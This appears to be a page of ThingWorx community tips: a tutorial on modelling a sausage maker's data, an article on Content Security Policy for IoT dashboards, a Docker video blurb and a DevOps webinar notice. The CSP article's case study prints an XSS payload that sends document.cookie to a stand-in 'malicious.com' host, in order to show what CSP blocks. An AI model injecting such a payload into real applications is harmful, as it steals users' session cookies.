D. Get help / give feedback / interact: Use the ThingWorx Service Apps Community page as a resource to find documentation, peruse past forum threads, or post a question to start a discussion! For advanced troubleshooting, licensed users are encouraged to submit support tickets to the PTC My eSupport portal.
View full tip
Learn how to create solutions that can help take you to the next level

Guide Concept

This project will introduce more complex aspects of ThingWorx application and solution building.

Following the steps in this guide, you will develop your own IoT application or get a jump start in how to utilize ThingWorx for your needs.

We will teach you how to create a focused rules engine or service-level logic to be used with the ThingWorx Platform.

You'll learn how to:
Create automated processing, data, and endpoints that can handle that data without manual interaction
Use Services, Alerts, and Subscriptions to increase performance
Begin making your data model and cornerstone entities to understand how a complex business logic is built

NOTE: The estimated time to complete this guide is 60 minutes.

Step 1: Completed Example

Download the attached FoodIndustry.zip and extract/import the contents. These are to be used as you work through this learning path. For the completed example, download FoodIndustryComplete.zip, unzip the download, and import the Entities included.

In this tutorial we walk you through a real-world scenario for a food company looking to improve its processes. We manufacture the best sausages in town! We sell directly to people and through participating store locations. The focus will be to provide meaningful data for decision making, constant updates on food quality, logistics, transparency, and safety. See the table below for the list of entities we will create in this guide; they are also included in the download.

Name: Description
Fizos.LandingPage: The main page that showcases highlights and possibly important information
Fizos.Deliveries: A look into product delivery and logistics
Fizos.Alerts: Details about any important actionable information
Fizos.Factory.User: A user to be used for our automated process

There is a large set of Entities provided in this download. The application created in this guide is part of a final version of what we will create throughout this learning path. If you have not yet learned about Services, Events/Alerts, and Subscriptions, please take a walk through our Implementing Services, Events, and Subscriptions guide.

This guide will begin the base of our data model, create data for our factories, and show how we can create automated processes using that data. We will then expand on these items as we move forward in this learning path.

Step 2: Utilizing IoT in the Food Industry

Whenever modeling products in ThingWorx, you should evaluate whether to create them using the data model (Things, Thing Templates, Thing Shapes, etc.) or using Data Tables and Data Shapes. You have to decide the method that works best for you. One way to think about this is whether a single ThingWorx entity should encapsulate each product's data, OR whether you have so many products (especially when the catalog is volatile) that you would rather track them at a higher level.

In our scenario, we won't need to track sausages at the individual level, so we can track the machines creating, holding, and packaging them. This also allows us to run analytics on the data and export it into our favorite tools for further processing.

1. In the ThingWorx Composer, click + New in the top left of the screen.
2. Select Data Shape in the dropdown.
3. In the name field, enter Fizos.DataShapes.Products. This Data Shape will hold high-level information about our differing products as a whole.
4. Set the Project (ie, PTCDefaultProject) and click Save to store all changes.
5. Click on the Field Definitions tab.
6. Click the + Add button and enter Name in the Name field of the new Field Definition.
7. Set up your Field Definitions to match the definitions below:

Name: Base Type: Aspects
ID: Integer: Primary Key. Default 0. Minimum 0.
Name: String: N/A
State: String: N/A
SKU: String: N/A
Price: Number: Minimum 0.
Mass: Number: Default 0. Minimum 0.
Volume: Number: Default 0. Minimum 0.

We now have the Data Shape for products. We can go two different routes as we create the Data Table for the products: we can make one Data Table for ALL company products, or we can create a Data Table for each machine that houses these products. If you want the latter option, you could associate the machine properties and services directly on the Data Table. This is a great option to condense the number of entities being used.

The level of granularity or simplicity is up to you. For this guide, we'll keep things simple and have one Data Table for all products. When we create the machine entities, we will have a table of the product IDs to help keep track of what products are contained in the machine.

1. In the ThingWorx Composer, click + New in the top left of the screen.
2. Select Data Table in the dropdown, then select Data Table in the pop-up.
3. In the name field, enter Fizos.DataTables.Products. All of our product line will fit this abstract entity.
4. For the Data Shape field, select Fizos.DataShapes.Products.
5. Set the Project field with an existing Project (ie, PTCDefaultProject) and click Save to store all changes.

We now have our setup complete for company products. Now let's create a Data Shape for any Event involving this product template.

1. In the ThingWorx Composer, click + New in the top left of the screen.
2. Select Data Shape in the dropdown.
3. In the name field, enter Fizos.ProductsEvent, and in the Project field, select an existing Project (ie, PTCDefaultProject). All of our product line will use this Data Shape as an alert/event.
4. Click Save to store all changes, then click Edit.
5. Perform the steps used earlier to create the below properties for the Fizos.ProductsEvent Data Shape:

Name: Base Type: Aspects
State: String: N/A
SKU: String: N/A
Price: Number: Minimum 0.
Name: String: N/A

Now let's create a Thing Template, a Stream, and a Value Stream to track some of what is happening with our products at a high level. The Value Stream will automatically track our data; we will add data to the Stream in the later sections.

1. In the ThingWorx Composer, click + New in the top left of the screen.
2. Select Thing Template in the dropdown.
3. In the name field, enter Fizos.Products as the name and GenericThing as the Base Thing Template.
4. Select a Project (ie, PTCDefaultProject) and click Save to store all changes.

Now, our new Stream.

1. In the ThingWorx Composer, click + New in the top left of the screen.
2. Select Stream in the dropdown, then select Stream in the pop-up.
3. In the name field, enter Fizos.ProductsStream and set the Project field (ie, PTCDefaultProject).
4. In the Data Shape field, select Fizos.ProductsEvent.
5. Click Save to store all changes.

Now, the Value Stream.

1. In the ThingWorx Composer, click + New in the top left of the screen.
2. Select Value Stream in the dropdown, then select ValueStream in the pop-up.
3. In the name field, enter Fizos.ProductsValueStream.
4. Set the Project field (ie, PTCDefaultProject) and click Save to store all changes.
5. Open the Fizos.Products Thing Template and set Fizos.ProductsValueStream as its Value Stream.

We're all set with high-level tracking of all of our products. At this point, we can start creating the entity that will provide the business logic for all products.

1. In the ThingWorx Composer, click + New in the top left of the screen.
2. Select Thing in the dropdown.
3. In the name field, enter Fizos.ProductsBusinessLogic.
4. For the Base Thing Template field, select GenericThing and set the Project field to an existing Project (ie, PTCDefaultProject).
5. Click Save to store all changes.
6. Click on the Services tab.
7. Click the + Add button and create the two Services below.

Name: Input: Return Type: Override: Async: Description
InspectFactory: Integer - factoryID: Nothing: Yes: Yes: Start an inspection for a specific factory
ReceiveInspection: JSON - report / String - guid: Nothing: Yes: Yes: Log/store an inspection for a specific factory

At this point, you have the building blocks to begin your industry business logic and rules engine (a sketch of inserting product data follows at the end of this post). In the next section, we'll do more development and further build out our model.

Click here to view Part 2 of this guide.
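As a footnote to the steps above, here is a rough sketch of how a service might insert a product row into the Fizos.DataTables.Products Data Table created in this guide. The sample field values are made up, and the exact snippet Composer generates may differ slightly by version:

// Assumes a ThingWorx service with access to the Data Table created above
var productsTable = Things["Fizos.DataTables.Products"];

// CreateValues returns an infotable matching the table's Data Shape
var values = productsTable.CreateValues();
values.ID = 1;                 /* INTEGER - primary key */
values.Name = "Bratwurst";     /* STRING  (sample value) */
values.State = "Packaged";     /* STRING  (sample value) */
values.SKU = "FIZ-BRAT-001";   /* STRING  (sample value) */
values.Price = 4.99;           /* NUMBER */
values.Mass = 0.5;             /* NUMBER */
values.Volume = 0.4;           /* NUMBER */

// Store the row; AddDataTableEntry returns the new entry's ID
var id = productsTable.AddDataTableEntry({
    sourceType: "Service",
    values: values,
    source: "Fizos.ProductsBusinessLogic",
    tags: undefined
});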
View full tip
Introduction

As the Internet of Things (IoT) continues to grow, securing web applications and connected devices is more critical than ever. Content Security Policy (CSP) is a security feature that helps protect IoT applications from malicious threats by controlling which resources, such as scripts, styles, and images, can be loaded and executed in a browser. This article explores what CSP is, the types of attacks it prevents, its role in securing IoT applications, the most common CSP directives used for enhanced security, and a real-world case study demonstrating CSP in action.

What is Content Security Policy (CSP)?

Content Security Policy (CSP) is a web security standard designed to reduce the risk of security vulnerabilities such as Cross-Site Scripting (XSS), data injection, and clickjacking by enforcing strict content-loading policies within web applications. It allows developers to specify which domains are permitted to execute scripts, load images, fetch data, and render styles, ensuring that only trusted sources can interact with the application.

How CSP Works

CSP works by defining security policies through HTTP headers or <meta> tags in the HTML document. These policies restrict the sources from which the browser can load various types of content, including JavaScript, CSS, and images. By doing so, CSP helps prevent unauthorized code execution and ensures that applications only interact with pre-approved content providers.

Why CSP is Essential

In an era where cyber threats are becoming more sophisticated, CSP plays a crucial role in securing web applications by:

Blocking Malicious Scripts: Prevents the execution of unauthorized JavaScript injected by attackers.
Preventing Data Exfiltration: Stops malicious code from sending sensitive user or device data to untrusted servers.
Mitigating Clickjacking: Restricts embedding in iframes to prevent deceptive UI attacks.
Enforcing Trusted Sources: Ensures that all resource requests originate from approved locations.

Types of Attacks Prevented by CSP

CSP acts as a defense mechanism against several types of web security threats, including:

a. Cross-Site Scripting (XSS)

Attackers inject malicious JavaScript into a web page to steal sensitive information, manipulate content, or perform unauthorized actions on behalf of the user. CSP prevents XSS by restricting the execution of inline scripts and untrusted third-party JavaScript.

b. Clickjacking

Attackers trick users into clicking hidden elements (e.g., disguised buttons or links) within an iframe, potentially leading to account hijacking or unintended actions. CSP helps mitigate clickjacking by enforcing the frame-ancestors directive, which controls who can embed the application in an iframe.

c. Data Injection Attacks

Attackers inject malicious content into an application, leading to data leaks, corrupted transactions, or manipulated IoT device responses. CSP limits data injection risks by restricting content sources and enforcing secure policies.

d. Mixed Content Attacks

When a secure HTTPS site loads insecure HTTP resources, attackers can intercept or modify the content. CSP prevents mixed content vulnerabilities by enforcing policies that allow only secure content to be loaded.

Role of CSP in Securing IoT Applications

IoT applications often involve web-based dashboards, real-time analytics, and device interactions, making them attractive targets for cyber threats. CSP plays a crucial role in strengthening security by:
a. Restricting Untrusted Content

IoT platforms often load content dynamically from various sources, including APIs, third-party libraries, and external services. Without CSP, attackers can inject malicious scripts into these data streams, compromising the integrity of IoT dashboards. By defining strict CSP policies, developers can ensure that only pre-approved content sources are allowed.

b. Preventing Unauthorized Data Access

Many IoT applications handle sensitive data, such as real-time sensor readings, user credentials, and system logs. Attackers may attempt to inject malicious scripts that exfiltrate this data to external servers. CSP prevents such unauthorized access by blocking script execution from untrusted origins and preventing cross-origin data leaks.

c. Strengthening Access Control

In IoT ecosystems, multiple users, devices, and services interact with web applications. Without strict access controls, attackers can exploit weak points to execute unauthorized commands or alter data. CSP helps enforce access control by limiting the execution of scripts and API requests to verified sources, ensuring that only authenticated and authorized entities can interact with the system.

d. Minimizing Third-Party Risks

Many IoT applications integrate with third-party analytics tools, mapping services, and external widgets. If these third-party services are compromised, they can introduce vulnerabilities into the IoT ecosystem. CSP allows developers to whitelist only trusted third-party services, reducing the risk of supply chain attacks.

Common CSP Directives for Enhanced Security

To maximize security, developers should implement the following key CSP directives:

default-src: Defines the default source for all types of content (scripts, images, styles, etc.)
connect-src: Governs network requests (e.g., API calls, WebSockets, IoT data exchanges)
font-src: Specifies trusted sources for web fonts
frame-ancestors: Prevents clickjacking by restricting which domains can embed the application in an iframe
frame-src: Controls the sources from which iframes can be loaded
img-src: Specifies trusted sources for loading images
media-src: Defines allowed sources for media files like audio and video
object-src: Restricts the sources from which plugins (e.g., Flash, Java applets) can be loaded
script-src: Controls which sources are allowed to execute JavaScript
style-src: Restricts the sources for CSS stylesheets
worker-src: Defines the sources allowed to create web workers and service workers

By defining a least-privilege CSP policy, developers can significantly reduce the attack surface and protect IoT applications from evolving cyber threats.

Case Study: Preventing an XSS Attack in an Industrial IoT Platform

Scenario:

A manufacturing company uses an Industrial IoT (IIoT) platform to monitor real-time sensor data from its factory machinery. The platform provides a web-based dashboard where engineers can track machine performance, predict failures, and configure alerts.

Attack Attempt:

An attacker exploits a form input field used for naming machines and injects the following malicious script:

<script>fetch('https://malicious.com/steal?data='+document.cookie);</script>

Since the platform lacks CSP enforcement, this script executes within the engineers' browsers, stealing session cookies and granting unauthorized access to the attacker.
How CSP Prevented the Attack:

By implementing a CSP policy that restricts script execution to trusted sources, the attack is neutralized. The following CSP directive is applied:

Content-Security-Policy: script-src 'self' https://trusted-scripts.com;

This prevents unauthorized script execution, ensuring that malicious scripts injected by attackers do not run within the IIoT platform. As a result, the IIoT system remains secure, preventing attackers from compromising sensitive factory data or disrupting production operations.

Conclusion

Content Security Policy (CSP) is a fundamental security measure for modern web applications, particularly those operating in IoT environments. By understanding CSP, recognizing the threats it mitigates, and implementing the most effective directives, developers can ensure a more secure and resilient application framework.

CSP support has been introduced in ThingWorx versions 9.3.15, 9.4.5, 9.5.1, and 9.6.0. In the initial release, this feature is disabled by default, and cloud customers will need to contact the support team to request activation. The current implementation establishes a foundation that facilitates future out-of-the-box (OOTB) enablement of CSP in subsequent releases.

For more information on implementing the Content Security Policy, refer to the ThingWorx Help Center.

Vineet Khokhar
Principal Product Manager, IoT Security

Stay tuned for more updates as we approach the release of ThingWorx v10.0, and as always, in case of issues, feel free to reach out to <support.ptc.com>.
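For illustration only (ThingWorx itself enables CSP through platform configuration, as noted above), here is a minimal sketch of how a generic Node.js web server could attach a restrictive CSP header to every response. The whitelisted origin https://trusted-scripts.com and port 8080 are placeholder values:

// Minimal Node.js server that sends a CSP header with every response.
const http = require('http');

const CSP_POLICY = [
  "default-src 'self'",                             // fallback for all content types
  "script-src 'self' https://trusted-scripts.com",  // only local + whitelisted JS
  "frame-ancestors 'none'",                         // block embedding (clickjacking)
  "object-src 'none'"                               // disallow plugins entirely
].join('; ');

http.createServer((req, res) => {
  res.setHeader('Content-Security-Policy', CSP_POLICY);
  res.setHeader('Content-Type', 'text/html');
  res.end('<html><body>IoT dashboard placeholder</body></html>');
}).listen(8080);

With this policy in place, a payload like the injected <script> above is refused by the browser, because inline scripts and the attacker's origin are not in the script-src whitelist.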
View full tip
Video Author: Christophe Morfin
Original Post Date: September 26, 2017
Applicable Releases: ThingWorx Analytics 8.0 & 8.1

Description:
This video shows the commands to execute in order to deploy the training and results microservices as Docker containers. It is based on Docker Toolbox, to highlight the specific settings required for Toolbox.
View full tip
Is your team operating an effective DevOps pipeline? DevOps is an important part of a mature, enterprise-ready application, but the process isn't simple.

This expert session will focus on what a full DevOps pipeline looks like and how PTC can help you build a seamless one. Join us for our upcoming Expert Session to learn how to create a Docker image, integrate Azure with Docker and Git, and set up a seamless DevOps pipeline.

When? Thursday, September 30th, 2021 | 11 AM EST
Host: Tori Firewind, Senior Engineer in the PTC IoT Enterprise Deployment Center
Registration link: https://www.ptc.com/en/resources/iiot/webcast/devops-pipeline-thingworx
View full tip